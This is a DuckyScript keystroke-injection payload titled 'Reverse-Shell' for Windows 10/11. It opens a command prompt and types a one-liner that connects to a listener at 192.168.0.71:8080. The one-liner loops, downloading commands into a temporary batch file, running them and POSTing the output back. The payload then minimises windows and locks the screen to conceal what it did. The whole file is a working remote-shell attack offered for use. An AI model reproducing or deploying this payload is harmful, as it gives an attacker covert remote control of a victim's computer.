REM #####################################################
REM #                                                   |
REM # Title        : Reverse-Shell                      |
REM # Written By   : CyberSauce                         |
REM # Version      : 1                                  |
REM # Category     : Execution                          |
REM # Target       : Windows 10/11                      |
REM # Tested on    :                                    |
REM #                                                   |
REM #####################################################
DELAY 1000
WINDOWS r
DELAY 1000
STRING CMD
ENTER
DELAY 2000
STRING @echo off&cmd /V:ON /C "SET ip=192.168.0.71:8080&&SET sid="Authorization: eb6a44aa-8acc1e56-629ea455"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1" > NUL
ENTER
DELAY 1000
WINDOWS m
DELAY 1000
WINDOWS l
